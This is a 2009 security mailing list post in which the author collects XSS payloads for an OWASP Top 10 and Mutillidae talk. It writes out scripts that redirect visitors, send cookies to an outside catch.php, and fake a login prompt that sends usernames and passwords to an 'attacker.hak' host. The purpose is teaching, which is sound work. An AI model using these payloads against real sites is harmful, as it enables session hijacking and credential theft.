PaulDotCom mailing list archives
Cool things to inject via XSS
From: irongeek at irongeek.com (Adrian Crenshaw)
Date: Thu, 28 May 2009 14:50:39 -0400
Ok, I've got yet another presentation coming up, this time on the OWASP Top 10 and Mutillidae. One of the things I'm going to cover is XSS. The canonical example of course is: <script>alert("XSS");</script> but that is boring, and gives folks the impression that XSS is not that serious. Better short eample swoul be: *Redirect traffic to your site:* <script>window.location = "http://www.irongeek.com/"</script> *A little cookie Grabbing:* <script> new Image().src="http://some-ip/mutillidae/catch.php?cookie= "+encodeURI(document.cookie); </script> * Or maybe a password form to make people think they have to login, but it just grabs the credentials:* <script> username=prompt('Please enter your username',' '); password=prompt('Please enter your password',' '); document.write("<img src=\"http://attacker.hak/catch.php?username= "+username+"&password="+password+"\">"); </script> What are other cool thing to inject, besides maybe BeEF, that shows of how XSS can be a big deal? Thanks, Adrian -------------- next part -------------- An HTML attachment was scrubbed... URL: http://mail.pauldotcom.com/pipermail/pauldotcom/attachments/20090528/1ba904a3/attachment.htm
Current thread:
- Cool things to inject via XSS Adrian Crenshaw (May 28)
- Cool things to inject via XSS Michael McGrew (May 28)
- Cool things to inject via XSS Jim Halfpenny (May 28)
- Cool things to inject via XSS christopher.riley at r-it.at (May 29)
- Cool things to inject via XSS Michael Douglas (May 29)
- Cool things to inject via XSS packetjack (May 29)
- Cool things to inject via XSS Adrian Crenshaw (May 29)
- Cool things to inject via XSS Robin Wood (May 30)
- Finding the common thread... christopher.riley at r-it.at (Jun 15)
- Finding the common thread... Jim Halfpenny (Jun 15)
- Finding the common thread... christopher.riley at r-it.at (Jun 16)
- Cool things to inject via XSS Michael Douglas (May 29)